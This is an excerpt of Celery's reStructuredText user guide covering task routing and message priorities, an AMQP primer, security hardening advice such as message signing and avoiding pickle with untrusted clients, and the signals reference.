setting: .. 
code-block:: python task_routes = { 'feeds.tasks.import_feed': { 'queue': 'feed_tasks', 'routing_key': 'feed.import', }, } You can also override this using the `routing_key` argument to :meth:`Task.apply_async`, or :func:`~celery.execute.send_task`: >>> from feeds.tasks import import_feed >>> import_feed.apply_async(args=['http://cnn.com/rss'], ... queue='feed_tasks', ... routing_key='feed.import') To make server `z` consume from the feed queue exclusively you can start it with the :option:`celery worker -Q` option: .. code-block:: console user@z:/$ celery -A proj worker -Q feed_tasks --hostname=z@%h Servers `x` and `y` must be configured to consume from the default queue: .. code-block:: console user@x:/$ celery -A proj worker -Q default --hostname=x@%h user@y:/$ celery -A proj worker -Q default --hostname=y@%h If you want, you can even have your feed processing worker handle regular tasks as well, maybe in times when there's a lot of work to do: .. code-block:: console user@z:/$ celery -A proj worker -Q feed_tasks,default --hostname=z@%h If you have another queue but on another exchange you want to add, just specify a custom exchange and exchange type: .. code-block:: python from kombu import Exchange, Queue app.conf.task_queues = ( Queue('feed_tasks', routing_key='feed.#'), Queue('regular_tasks', routing_key='task.#'), Queue('image_tasks', exchange=Exchange('mediatasks', type='direct'), routing_key='image.compress'), ) If you're confused about these terms, you should read up on AMQP. .. seealso:: In addition to the :ref:`amqp-primer` below, there's `Rabbits and Warrens`_, an excellent blog post describing queues and exchanges. There's also The `CloudAMQP tutorial`, For users of RabbitMQ the `RabbitMQ FAQ`_ could be useful as a source of information. .. _`Rabbits and Warrens`: http://web.archive.org/web/20160323134044/http://blogs.digitar.com/jjww/2009/01/rabbits-and-warrens/ .. _`CloudAMQP tutorial`: amqp in 10 minutes part 3 https://www.cloudamqp.com/blog/2015-09-03-part4-rabbitmq-for-beginners-exchanges-routing-keys-bindings.html .. _`RabbitMQ FAQ`: https://www.rabbitmq.com/faq.html .. _routing-special_options: Special Routing Options ======================= .. _routing-options-rabbitmq-priorities: RabbitMQ Message Priorities --------------------------- :supported transports: RabbitMQ .. versionadded:: 4.0 Queues can be configured to support priorities by setting the ``x-max-priority`` argument: .. code-block:: python from kombu import Exchange, Queue app.conf.task_queues = [ Queue('tasks', Exchange('tasks'), routing_key='tasks', queue_arguments={'x-max-priority': 10}), ] A default value for all queues can be set using the :setting:`task_queue_max_priority` setting: .. code-block:: python app.conf.task_queue_max_priority = 10 A default priority for all tasks can also be specified using the :setting:`task_default_priority` setting: .. code-block:: python app.conf.task_default_priority = 5 .. _amqp-primer: Redis Message Priorities ------------------------ :supported transports: Redis While the Celery Redis transport does honor the priority field, Redis itself has no notion of priorities. Please read this note before attempting to implement priorities with Redis as you may experience some unexpected behavior. To start scheduling tasks based on priorities you need to configure queue_order_strategy transport option. .. code-block:: python app.conf.broker_transport_options = { 'queue_order_strategy': 'priority', } The priority support is implemented by creating n lists for each queue. 
This means that even though there are 10 (0-9) priority levels, these are consolidated into 4 levels by default to save resources. This means that a queue named celery will really be split into 4 queues. The highest priority queue will be named celery, and the the other queues will have a separator (by default `\x06\x16`) and their priority number appended to the queue name. .. code-block:: python ['celery', 'celery\x06\x163', 'celery\x06\x166', 'celery\x06\x169'] If you want more priority levels or a different separator you can set the priority_steps and sep transport options: .. code-block:: python app.conf.broker_transport_options = { 'priority_steps': list(range(10)), 'sep': ':', 'queue_order_strategy': 'priority', } The config above will give you these queue names: .. code-block:: python ['celery', 'celery:1', 'celery:2', 'celery:3', 'celery:4', 'celery:5', 'celery:6', 'celery:7', 'celery:8', 'celery:9'] That said, note that this will never be as good as priorities implemented at the server level, and may be approximate at best. But it may still be good enough for your application. AMQP Primer =========== Messages -------- A message consists of headers and a body. Celery uses headers to store the content type of the message and its content encoding. The content type is usually the serialization format used to serialize the message. The body contains the name of the task to execute, the task id (UUID), the arguments to apply it with and some additional meta-data -- like the number of retries or an ETA. This is an example task message represented as a Python dictionary: .. code-block:: javascript {'task': 'myapp.tasks.add', 'id': '54086c5e-6193-4575-8308-dbab76798756', 'args': [4, 4], 'kwargs': {}} .. _amqp-producers-consumers-brokers: Producers, consumers, and brokers --------------------------------- The client sending messages is typically called a *publisher*, or a *producer*, while the entity receiving messages is called a *consumer*. The *broker* is the message server, routing messages from producers to consumers. You're likely to see these terms used a lot in AMQP related material. .. _amqp-exchanges-queues-keys: Exchanges, queues, and routing keys ----------------------------------- 1. Messages are sent to exchanges. 2. An exchange routes messages to one or more queues. Several exchange types exists, providing different ways to do routing, or implementing different messaging scenarios. 3. The message waits in the queue until someone consumes it. 4. The message is deleted from the queue when it has been acknowledged. The steps required to send and receive messages are: 1. Create an exchange 2. Create a queue 3. Bind the queue to the exchange. Celery automatically creates the entities necessary for the queues in :setting:`task_queues` to work (except if the queue's `auto_declare` setting is set to :const:`False`). Here's an example queue configuration with three queues; One for video, one for images, and one default queue for everything else: .. code-block:: python from kombu import Exchange, Queue app.conf.task_queues = ( Queue('default', Exchange('default'), routing_key='default'), Queue('videos', Exchange('media'), routing_key='media.video'), Queue('images', Exchange('media'), routing_key='media.image'), ) app.conf.task_default_queue = 'default' app.conf.task_default_exchange_type = 'direct' app.conf.task_default_routing_key = 'default' .. _amqp-exchange-types: Exchange types -------------- The exchange type defines how the messages are routed through the exchange. 
The exchange types defined in the standard are `direct`, `topic`, `fanout` and `headers`. Also non-standard exchange types are available as plug-ins to RabbitMQ, like the `last-value-cache plug-in`_ by Michael Bridgen. .. _`last-value-cache plug-in`: https://github.com/squaremo/rabbitmq-lvc-plugin .. _amqp-exchange-type-direct: Direct exchanges ~~~~~~~~~~~~~~~~ Direct exchanges match by exact routing keys, so a queue bound by the routing key `video` only receives messages with that routing key. .. _amqp-exchange-type-topic: Topic exchanges ~~~~~~~~~~~~~~~ Topic exchanges matches routing keys using dot-separated words, and the wild-card characters: ``*`` (matches a single word), and ``#`` (matches zero or more words). With routing keys like ``usa.news``, ``usa.weather``, ``norway.news``, and ``norway.weather``, bindings could be ``*.news`` (all news), ``usa.#`` (all items in the USA), or ``usa.weather`` (all USA weather items). .. _amqp-api: Related API commands -------------------- .. method:: exchange.declare(exchange_name, type, passive, durable, auto_delete, internal) Declares an exchange by name. See :meth:`amqp:Channel.exchange_declare `. :keyword passive: Passive means the exchange won't be created, but you can use this to check if the exchange already exists. :keyword durable: Durable exchanges are persistent (i.e., they survive a broker restart). :keyword auto_delete: This means the exchange will be deleted by the broker when there are no more queues using it. .. method:: queue.declare(queue_name, passive, durable, exclusive, auto_delete) Declares a queue by name. See :meth:`amqp:Channel.queue_declare ` Exclusive queues can only be consumed from by the current connection. Exclusive also implies `auto_delete`. .. method:: queue.bind(queue_name, exchange_name, routing_key) Binds a queue to an exchange with a routing key. Unbound queues won't receive messages, so this is necessary. See :meth:`amqp:Channel.queue_bind ` .. method:: queue.delete(name, if_unused=False, if_empty=False) Deletes a queue and its binding. See :meth:`amqp:Channel.queue_delete ` .. method:: exchange.delete(name, if_unused=False) Deletes an exchange. See :meth:`amqp:Channel.exchange_delete ` .. note:: Declaring doesn't necessarily mean "create". When you declare you *assert* that the entity exists and that it's operable. There's no rule as to whom should initially create the exchange/queue/binding, whether consumer or producer. Usually the first one to need it will be the one to create it. .. _amqp-api-hands-on: Hands-on with the API --------------------- Celery comes with a tool called :program:`celery amqp` that's used for command line access to the AMQP API, enabling access to administration tasks like creating/deleting queues and exchanges, purging queues or sending messages. It can also be used for non-AMQP brokers, but different implementation may not implement all commands. You can write commands directly in the arguments to :program:`celery amqp`, or just start with no arguments to start it in shell-mode: .. code-block:: console $ celery -A proj amqp -> connecting to amqp://guest@localhost:5672/. -> connected. 1> Here ``1>`` is the prompt. The number 1, is the number of commands you have executed so far. Type ``help`` for a list of commands available. It also supports auto-completion, so you can start typing a command and then hit the `tab` key to show a list of possible matches. Let's create a queue you can send messages to: .. 
code-block:: console $ celery -A proj amqp 1> exchange.declare testexchange direct ok. 2> queue.declare testqueue ok. queue:testqueue messages:0 consumers:0. 3> queue.bind testqueue testexchange testkey ok. This created the direct exchange ``testexchange``, and a queue named ``testqueue``. The queue is bound to the exchange using the routing key ``testkey``. From now on all messages sent to the exchange ``testexchange`` with routing key ``testkey`` will be moved to this queue. You can send a message by using the ``basic.publish`` command: .. code-block:: console 4> basic.publish 'This is a message!' testexchange testkey ok. Now that the message is sent you can retrieve it again. You can use the ``basic.get`` command here, that polls for new messages on the queue in a synchronous manner (this is OK for maintenance tasks, but for services you want to use ``basic.consume`` instead) Pop a message off the queue: .. code-block:: console 5> basic.get testqueue {'body': 'This is a message!', 'delivery_info': {'delivery_tag': 1, 'exchange': u'testexchange', 'message_count': 0, 'redelivered': False, 'routing_key': u'testkey'}, 'properties': {}} AMQP uses acknowledgment to signify that a message has been received and processed successfully. If the message hasn't been acknowledged and consumer channel is closed, the message will be delivered to another consumer. Note the delivery tag listed in the structure above; Within a connection channel, every received message has a unique delivery tag, This tag is used to acknowledge the message. Also note that delivery tags aren't unique across connections, so in another client the delivery tag `1` might point to a different message than in this channel. You can acknowledge the message you received using ``basic.ack``: .. code-block:: console 6> basic.ack 1 ok. To clean up after our test session you should delete the entities you created: .. code-block:: console 7> queue.delete testqueue ok. 0 messages deleted. 8> exchange.delete testexchange ok. .. _routing-tasks: Routing Tasks ============= .. _routing-defining-queues: Defining queues --------------- In Celery available queues are defined by the :setting:`task_queues` setting. Here's an example queue configuration with three queues; One for video, one for images, and one default queue for everything else: .. code-block:: python default_exchange = Exchange('default', type='direct') media_exchange = Exchange('media', type='direct') app.conf.task_queues = ( Queue('default', default_exchange, routing_key='default'), Queue('videos', media_exchange, routing_key='media.video'), Queue('images', media_exchange, routing_key='media.image') ) app.conf.task_default_queue = 'default' app.conf.task_default_exchange = 'default' app.conf.task_default_routing_key = 'default' Here, the :setting:`task_default_queue` will be used to route tasks that doesn't have an explicit route. The default exchange, exchange type, and routing key will be used as the default routing values for tasks, and as the default values for entries in :setting:`task_queues`. Multiple bindings to a single queue are also supported. Here's an example of two routing keys that are both bound to the same queue: .. code-block:: python from kombu import Exchange, Queue, binding media_exchange = Exchange('media', type='direct') CELERY_QUEUES = ( Queue('media', [ binding(media_exchange, routing_key='media.video'), binding(media_exchange, routing_key='media.image'), ]), ) .. 
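The last example uses the old ``CELERY_QUEUES`` setting name; with the
new-style lowercase settings used elsewhere in this guide, the same
multiple-binding layout would be configured as follows (a sketch of the
equivalent configuration):

.. code-block:: python

    app.conf.task_queues = (
        Queue('media', [
            binding(media_exchange, routing_key='media.video'),
            binding(media_exchange, routing_key='media.image'),
        ]),
    )

..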
_routing-task-destination: Specifying task destination --------------------------- The destination for a task is decided by the following (in order): 1. The routing arguments to :func:`Task.apply_async`. 2. Routing related attributes defined on the :class:`~celery.app.task.Task` itself. 3. The :ref:`routers` defined in :setting:`task_routes`. It's considered best practice to not hard-code these settings, but rather leave that as configuration options by using :ref:`routers`; This is the most flexible approach, but sensible defaults can still be set as task attributes. .. _routers: Routers ------- A router is a function that decides the routing options for a task. All you need to define a new router is to define a function with the signature ``(name, args, kwargs, options, task=None, **kw)``: .. code-block:: python def route_task(name, args, kwargs, options, task=None, **kw): if name == 'myapp.tasks.compress_video': return {'exchange': 'video', 'exchange_type': 'topic', 'routing_key': 'video.compress'} If you return the ``queue`` key, it'll expand with the defined settings of that queue in :setting:`task_queues`: .. code-block:: javascript {'queue': 'video', 'routing_key': 'video.compress'} becomes --> .. code-block:: javascript {'queue': 'video', 'exchange': 'video', 'exchange_type': 'topic', 'routing_key': 'video.compress'} You install router classes by adding them to the :setting:`task_routes` setting: .. code-block:: python task_routes = (route_task,) Router functions can also be added by name: .. code-block:: python task_routes = ('myapp.routers.route_task',) For simple task name -> route mappings like the router example above, you can simply drop a dict into :setting:`task_routes` to get the same behavior: .. code-block:: python task_routes = { 'myapp.tasks.compress_video': { 'queue': 'video', 'routing_key': 'video.compress', }, } The routers will then be traversed in order, it will stop at the first router returning a true value, and use that as the final route for the task. You can also have multiple routers defined in a sequence: .. code-block:: python task_routes = [ route_task, { 'myapp.tasks.compress_video': { 'queue': 'video', 'routing_key': 'video.compress', }, ] The routers will then be visited in turn, and the first to return a value will be chosen. If you\'re using Redis or RabbitMQ you can also specify the queue\'s default priority in the route. .. code-block:: python task_routes = { 'myapp.tasks.compress_video': { 'queue': 'video', 'routing_key': 'video.compress', 'priority': 10, }, } Similarly, calling `apply_async` on a task will override that default priority. .. code-block:: python task.apply_async(priority=0) .. admonition:: Priority Order and Cluster Responsiveness It is important to note that, due to worker prefetching, if a bunch of tasks submitted at the same time they may be out of priority order at first. Disabling worker prefetching will prevent this issue, but may cause less than ideal performance for small, fast tasks. In most cases, simply reducing `worker_prefetch_multiplier` to 1 is an easier and cleaner way to increase the responsiveness of your system without the costs of disabling prefetching entirely. Note that priorities values are sorted in reverse when using the redis broker: 0 being highest priority. Broadcast --------- Celery can also support broadcast routing. Here is an example exchange ``broadcast_tasks`` that delivers copies of tasks to all workers connected to it: .. 
code-block:: python from kombu.common import Broadcast app.conf.task_queues = (Broadcast('broadcast_tasks'),) app.conf.task_routes = { 'tasks.reload_cache': { 'queue': 'broadcast_tasks', 'exchange': 'broadcast_tasks' } } Now the ``tasks.reload_cache`` task will be sent to every worker consuming from this queue. Here is another example of broadcast routing, this time with a :program:`celery beat` schedule: .. code-block:: python from kombu.common import Broadcast from celery.schedules import crontab app.conf.task_queues = (Broadcast('broadcast_tasks'),) app.conf.beat_schedule = { 'test-task': { 'task': 'tasks.reload_cache', 'schedule': crontab(minute=0, hour='*/3'), 'options': {'exchange': 'broadcast_tasks'} }, } .. admonition:: Broadcast & Results Note that Celery result doesn't define what happens if two tasks have the same task_id. If the same task is distributed to more than one worker, then the state history may not be preserved. It's a good idea to set the ``task.ignore_result`` attribute in this case. ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/security.rst0000664000175000017500000002060500000000000020225 0ustar00asifasif00000000000000.. _guide-security: ========== Security ========== .. contents:: :local: Introduction ============ While Celery is written with security in mind, it should be treated as an unsafe component. Depending on your `Security Policy`_, there are various steps you can take to make your Celery installation more secure. .. _`Security Policy`: https://en.wikipedia.org/wiki/Security_policy Areas of Concern ================ Broker ------ It's imperative that the broker is guarded from unwanted access, especially if accessible to the public. By default, workers trust that the data they get from the broker hasn't been tampered with. See `Message Signing`_ for information on how to make the broker connection more trustworthy. The first line of defense should be to put a firewall in front of the broker, allowing only white-listed machines to access it. Keep in mind that both firewall misconfiguration, and temporarily disabling the firewall, is common in the real world. Solid security policy includes monitoring of firewall equipment to detect if they've been disabled, be it accidentally or on purpose. In other words, one shouldn't blindly trust the firewall either. If your broker supports fine-grained access control, like RabbitMQ, this is something you should look at enabling. See for example http://www.rabbitmq.com/access-control.html. If supported by your broker backend, you can enable end-to-end SSL encryption and authentication using :setting:`broker_use_ssl`. Client ------ In Celery, "client" refers to anything that sends messages to the broker, for example web-servers that apply tasks. Having the broker properly secured doesn't matter if arbitrary messages can be sent through a client. *[Need more text here]* Worker ------ The default permissions of tasks running inside a worker are the same ones as the privileges of the worker itself. This applies to resources, such as; memory, file-systems, and devices. An exception to this rule is when using the multiprocessing based task pool, which is currently the default. In this case, the task will have access to any memory copied as a result of the :func:`fork` call, and access to memory contents written by parent tasks in the same worker child process. 
Limiting access to memory contents can be done by launching every task in a subprocess (:func:`fork` + :func:`execve`). Limiting file-system and device access can be accomplished by using `chroot`_, `jail`_, `sandboxing`_, virtual machines, or other mechanisms as enabled by the platform or additional software. Note also that any task executed in the worker will have the same network access as the machine on which it's running. If the worker is located on an internal network it's recommended to add firewall rules for outbound traffic. .. _`chroot`: https://en.wikipedia.org/wiki/Chroot .. _`jail`: https://en.wikipedia.org/wiki/FreeBSD_jail .. _`sandboxing`: https://en.wikipedia.org/wiki/Sandbox_(computer_security) .. _security-serializers: Serializers =========== The default serializer is JSON since version 4.0, but since it has only support for a restricted set of types you may want to consider using pickle for serialization instead. The `pickle` serializer is convenient as it can serialize almost any Python object, even functions with some work, but for the same reasons `pickle` is inherently insecure [*]_, and should be avoided whenever clients are untrusted or unauthenticated. You can disable untrusted content by specifying a white-list of accepted content-types in the :setting:`accept_content` setting: .. versionadded:: 3.0.18 .. note:: This setting was first supported in version 3.0.18. If you're running an earlier version it will simply be ignored, so make sure you're running a version that supports it. .. code-block:: python accept_content = ['json'] This accepts a list of serializer names and content-types, so you could also specify the content type for json: .. code-block:: python accept_content = ['application/json'] Celery also comes with a special `auth` serializer that validates communication between Celery clients and workers, making sure that messages originates from trusted sources. Using `Public-key cryptography` the `auth` serializer can verify the authenticity of senders, to enable this read :ref:`message-signing` for more information. .. _`Public-key cryptography`: https://en.wikipedia.org/wiki/Public-key_cryptography .. _message-signing: Message Signing =============== Celery can use the :pypi:`cryptography` library to sign message using `Public-key cryptography`, where messages sent by clients are signed using a private key and then later verified by the worker using a public certificate. Optimally certificates should be signed by an official `Certificate Authority`_, but they can also be self-signed. To enable this you should configure the :setting:`task_serializer` setting to use the `auth` serializer. Enforcing the workers to only accept signed messages, you should set `accept_content` to `['auth']`. For additional signing of the event protocol, set `event_serializer` to `auth`. Also required is configuring the paths used to locate private keys and certificates on the file-system: the :setting:`security_key`, :setting:`security_certificate`, and :setting:`security_cert_store` settings respectively. You can tweak the signing algorithm with :setting:`security_digest`. With these configured it's also necessary to call the :func:`celery.setup_security` function. Note that this will also disable all insecure serializers so that the worker won't accept messages with untrusted content types. This is an example configuration using the `auth` serializer, with the private key and certificate files located in `/etc/ssl`. .. 
code-block:: python app = Celery() app.conf.update( security_key='/etc/ssl/private/worker.key' security_certificate='/etc/ssl/certs/worker.pem' security_cert_store='/etc/ssl/certs/*.pem', security_digest='sha256', task_serializer='auth', event_serializer='auth', accept_content=['auth'] ) app.setup_security() .. note:: While relative paths aren't disallowed, using absolute paths is recommended for these files. Also note that the `auth` serializer won't encrypt the contents of a message, so if needed this will have to be enabled separately. .. _`X.509`: https://en.wikipedia.org/wiki/X.509 .. _`Certificate Authority`: https://en.wikipedia.org/wiki/Certificate_authority Intrusion Detection =================== The most important part when defending your systems against intruders is being able to detect if the system has been compromised. Logs ---- Logs are usually the first place to look for evidence of security breaches, but they're useless if they can be tampered with. A good solution is to set up centralized logging with a dedicated logging server. Access to it should be restricted. In addition to having all of the logs in a single place, if configured correctly, it can make it harder for intruders to tamper with your logs. This should be fairly easy to setup using syslog (see also `syslog-ng`_ and `rsyslog`_). Celery uses the :mod:`logging` library, and already has support for using syslog. A tip for the paranoid is to send logs using UDP and cut the transmit part of the logging server's network cable :-) .. _`syslog-ng`: https://en.wikipedia.org/wiki/Syslog-ng .. _`rsyslog`: http://www.rsyslog.com/ Tripwire -------- `Tripwire`_ is a (now commercial) data integrity tool, with several open source implementations, used to keep cryptographic hashes of files in the file-system, so that administrators can be alerted when they change. This way when the damage is done and your system has been compromised you can tell exactly what files intruders have changed (password files, logs, back-doors, root-kits, and so on). Often this is the only way you'll be able to detect an intrusion. Some open source implementations include: * `OSSEC`_ * `Samhain`_ * `Open Source Tripwire`_ * `AIDE`_ Also, the `ZFS`_ file-system comes with built-in integrity checks that can be used. .. _`Tripwire`: http://tripwire.com/ .. _`OSSEC`: http://www.ossec.net/ .. _`Samhain`: http://la-samhna.de/samhain/index.html .. _`AIDE`: http://aide.sourceforge.net/ .. _`Open Source Tripwire`: http://sourceforge.net/projects/tripwire/ .. _`ZFS`: https://en.wikipedia.org/wiki/ZFS .. rubric:: Footnotes .. [*] https://blog.nelhage.com/2011/03/exploiting-pickle/ ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/userguide/signals.rst0000664000175000017500000004242500000000000020022 0ustar00asifasif00000000000000.. _signals: ======= Signals ======= .. contents:: :local: Signals allow decoupled applications to receive notifications when certain actions occur elsewhere in the application. Celery ships with many signals that your application can hook into to augment behavior of certain actions. .. _signal-basics: Basics ====== Several kinds of events trigger signals, you can connect to these signals to perform actions as they trigger. Example connecting to the :signal:`after_task_publish` signal: .. 
code-block:: python from celery.signals import after_task_publish @after_task_publish.connect def task_sent_handler(sender=None, headers=None, body=None, **kwargs): # information about task are located in headers for task messages # using the task protocol version 2. info = headers if 'task' in headers else body print('after_task_publish for task id {info[id]}'.format( info=info, )) Some signals also have a sender you can filter by. For example the :signal:`after_task_publish` signal uses the task name as a sender, so by providing the ``sender`` argument to :class:`~celery.utils.dispatch.signal.Signal.connect` you can connect your handler to be called every time a task with name `"proj.tasks.add"` is published: .. code-block:: python @after_task_publish.connect(sender='proj.tasks.add') def task_sent_handler(sender=None, headers=None, body=None, **kwargs): # information about task are located in headers for task messages # using the task protocol version 2. info = headers if 'task' in headers else body print('after_task_publish for task id {info[id]}'.format( info=info, )) Signals use the same implementation as :mod:`django.core.dispatch`. As a result other keyword parameters (e.g., signal) are passed to all signal handlers by default. The best practice for signal handlers is to accept arbitrary keyword arguments (i.e., ``**kwargs``). That way new Celery versions can add additional arguments without breaking user code. .. _signal-ref: Signals ======= Task Signals ------------ .. signal:: before_task_publish ``before_task_publish`` ~~~~~~~~~~~~~~~~~~~~~~~ .. versionadded:: 3.1 Dispatched before a task is published. Note that this is executed in the process sending the task. Sender is the name of the task being sent. Provides arguments: * ``body`` Task message body. This is a mapping containing the task message fields, see :ref:`message-protocol-task-v2` and :ref:`message-protocol-task-v1` for a reference of possible fields that can be defined. * ``exchange`` Name of the exchange to send to or a :class:`~kombu.Exchange` object. * ``routing_key`` Routing key to use when sending the message. * ``headers`` Application headers mapping (can be modified). * ``properties`` Message properties (can be modified) * ``declare`` List of entities (:class:`~kombu.Exchange`, :class:`~kombu.Queue`, or :class:`~kombu.binding` to declare before publishing the message. Can be modified. * ``retry_policy`` Mapping of retry options. Can be any argument to :meth:`kombu.Connection.ensure` and can be modified. .. signal:: after_task_publish ``after_task_publish`` ~~~~~~~~~~~~~~~~~~~~~~ Dispatched when a task has been sent to the broker. Note that this is executed in the process that sent the task. Sender is the name of the task being sent. Provides arguments: * ``headers`` The task message headers, see :ref:`message-protocol-task-v2` and :ref:`message-protocol-task-v1` for a reference of possible fields that can be defined. * ``body`` The task message body, see :ref:`message-protocol-task-v2` and :ref:`message-protocol-task-v1` for a reference of possible fields that can be defined. * ``exchange`` Name of the exchange or :class:`~kombu.Exchange` object used. * ``routing_key`` Routing key used. .. signal:: task_prerun ``task_prerun`` ~~~~~~~~~~~~~~~ Dispatched before a task is executed. Sender is the task object being executed. Provides arguments: * ``task_id`` Id of the task to be executed. * ``task`` The task being executed. * ``args`` The tasks positional arguments. * ``kwargs`` The tasks keyword arguments. .. 
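For example, :signal:`task_prerun` can be paired with
:signal:`task_postrun` (documented next) to time task execution.
A minimal sketch, using a per-process dictionary as the registry
(the handler and variable names are illustrative only):

.. code-block:: python

    import time

    from celery.signals import task_prerun, task_postrun

    task_start_times = {}  # one entry per task id, per worker process

    @task_prerun.connect
    def record_start(task_id=None, **kwargs):
        task_start_times[task_id] = time.monotonic()

    @task_postrun.connect
    def report_runtime(task_id=None, task=None, **kwargs):
        started = task_start_times.pop(task_id, None)
        if started is not None:
            print('%s[%s] ran for %.3fs' % (
                task.name, task_id, time.monotonic() - started))

..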
signal:: task_postrun ``task_postrun`` ~~~~~~~~~~~~~~~~ Dispatched after a task has been executed. Sender is the task object executed. Provides arguments: * ``task_id`` Id of the task to be executed. * ``task`` The task being executed. * ``args`` The tasks positional arguments. * ``kwargs`` The tasks keyword arguments. * ``retval`` The return value of the task. * ``state`` Name of the resulting state. .. signal:: task_retry ``task_retry`` ~~~~~~~~~~~~~~ Dispatched when a task will be retried. Sender is the task object. Provides arguments: * ``request`` The current task request. * ``reason`` Reason for retry (usually an exception instance, but can always be coerced to :class:`str`). * ``einfo`` Detailed exception information, including traceback (a :class:`billiard.einfo.ExceptionInfo` object). .. signal:: task_success ``task_success`` ~~~~~~~~~~~~~~~~ Dispatched when a task succeeds. Sender is the task object executed. Provides arguments * ``result`` Return value of the task. .. signal:: task_failure ``task_failure`` ~~~~~~~~~~~~~~~~ Dispatched when a task fails. Sender is the task object executed. Provides arguments: * ``task_id`` Id of the task. * ``exception`` Exception instance raised. * ``args`` Positional arguments the task was called with. * ``kwargs`` Keyword arguments the task was called with. * ``traceback`` Stack trace object. * ``einfo`` The :class:`billiard.einfo.ExceptionInfo` instance. ``task_internal_error`` ~~~~~~~~~~~~~~~~~~~~~~~ Dispatched when an internal Celery error occurs while executing the task. Sender is the task object executed. .. signal:: task_internal_error Provides arguments: * ``task_id`` Id of the task. * ``args`` Positional arguments the task was called with. * ``kwargs`` Keyword arguments the task was called with. * ``request`` The original request dictionary. This is provided as the ``task.request`` may not be ready by the time the exception is raised. * ``exception`` Exception instance raised. * ``traceback`` Stack trace object. * ``einfo`` The :class:`billiard.einfo.ExceptionInfo` instance. ``task_received`` ~~~~~~~~~~~~~~~~~ Dispatched when a task is received from the broker and is ready for execution. Sender is the consumer object. .. signal:: task_received Provides arguments: * ``request`` This is a :class:`~celery.worker.request.Request` instance, and not ``task.request``. When using the prefork pool this signal is dispatched in the parent process, so ``task.request`` isn't available and shouldn't be used. Use this object instead, as they share many of the same fields. .. signal:: task_revoked ``task_revoked`` ~~~~~~~~~~~~~~~~ Dispatched when a task is revoked/terminated by the worker. Sender is the task object revoked/terminated. Provides arguments: * ``request`` This is a :class:`~celery.worker.request.Request` instance, and not ``task.request``. When using the prefork pool this signal is dispatched in the parent process, so ``task.request`` isn't available and shouldn't be used. Use this object instead, as they share many of the same fields. * ``terminated`` Set to :const:`True` if the task was terminated. * ``signum`` Signal number used to terminate the task. If this is :const:`None` and terminated is :const:`True` then :sig:`TERM` should be assumed. * ``expired`` Set to :const:`True` if the task expired. .. signal:: task_unknown ``task_unknown`` ~~~~~~~~~~~~~~~~ Dispatched when a worker receives a message for a task that's not registered. Sender is the worker :class:`~celery.worker.consumer.Consumer`. 
Provides arguments: * ``name`` Name of task not found in registry. * ``id`` The task id found in the message. * ``message`` Raw message object. * ``exc`` The error that occurred. .. signal:: task_rejected ``task_rejected`` ~~~~~~~~~~~~~~~~~ Dispatched when a worker receives an unknown type of message to one of its task queues. Sender is the worker :class:`~celery.worker.consumer.Consumer`. Provides arguments: * ``message`` Raw message object. * ``exc`` The error that occurred (if any). App Signals ----------- .. signal:: import_modules ``import_modules`` ~~~~~~~~~~~~~~~~~~ This signal is sent when a program (worker, beat, shell) etc, asks for modules in the :setting:`include` and :setting:`imports` settings to be imported. Sender is the app instance. Worker Signals -------------- .. signal:: celeryd_after_setup ``celeryd_after_setup`` ~~~~~~~~~~~~~~~~~~~~~~~ This signal is sent after the worker instance is set up, but before it calls run. This means that any queues from the :option:`celery worker -Q` option is enabled, logging has been set up and so on. It can be used to add custom queues that should always be consumed from, disregarding the :option:`celery worker -Q` option. Here's an example that sets up a direct queue for each worker, these queues can then be used to route a task to any specific worker: .. code-block:: python from celery.signals import celeryd_after_setup @celeryd_after_setup.connect def setup_direct_queue(sender, instance, **kwargs): queue_name = '{0}.dq'.format(sender) # sender is the nodename of the worker instance.app.amqp.queues.select_add(queue_name) Provides arguments: * ``sender`` Node name of the worker. * ``instance`` This is the :class:`celery.apps.worker.Worker` instance to be initialized. Note that only the :attr:`app` and :attr:`hostname` (nodename) attributes have been set so far, and the rest of ``__init__`` hasn't been executed. * ``conf`` The configuration of the current app. .. signal:: celeryd_init ``celeryd_init`` ~~~~~~~~~~~~~~~~ This is the first signal sent when :program:`celery worker` starts up. The ``sender`` is the host name of the worker, so this signal can be used to setup worker specific configuration: .. code-block:: python from celery.signals import celeryd_init @celeryd_init.connect(sender='worker12@example.com') def configure_worker12(conf=None, **kwargs): conf.task_default_rate_limit = '10/m' or to set up configuration for multiple workers you can omit specifying a sender when you connect: .. code-block:: python from celery.signals import celeryd_init @celeryd_init.connect def configure_workers(sender=None, conf=None, **kwargs): if sender in ('worker1@example.com', 'worker2@example.com'): conf.task_default_rate_limit = '10/m' if sender == 'worker3@example.com': conf.worker_prefetch_multiplier = 0 Provides arguments: * ``sender`` Nodename of the worker. * ``instance`` This is the :class:`celery.apps.worker.Worker` instance to be initialized. Note that only the :attr:`app` and :attr:`hostname` (nodename) attributes have been set so far, and the rest of ``__init__`` hasn't been executed. * ``conf`` The configuration of the current app. * ``options`` Options passed to the worker from command-line arguments (including defaults). .. signal:: worker_init ``worker_init`` ~~~~~~~~~~~~~~~ Dispatched before the worker is started. .. signal:: worker_ready ``worker_ready`` ~~~~~~~~~~~~~~~~ Dispatched when the worker is ready to accept work. .. 
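For example (a hypothetical sketch, not taken from the reference above), a
:signal:`worker_ready` handler can enqueue a warm-up task as soon as the
worker is able to accept work. The task name ``proj.tasks.warm_cache`` is a
placeholder, and the handler assumes the sender exposes the app as
``sender.app``:

.. code-block:: python

    from celery.signals import worker_ready

    @worker_ready.connect
    def enqueue_warmup(sender=None, **kwargs):
        # ``sender.app`` is assumed to be the Celery app; **kwargs keeps
        # the handler compatible with extra signal arguments.
        with sender.app.connection() as conn:
            sender.app.send_task('proj.tasks.warm_cache', connection=conn)

..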
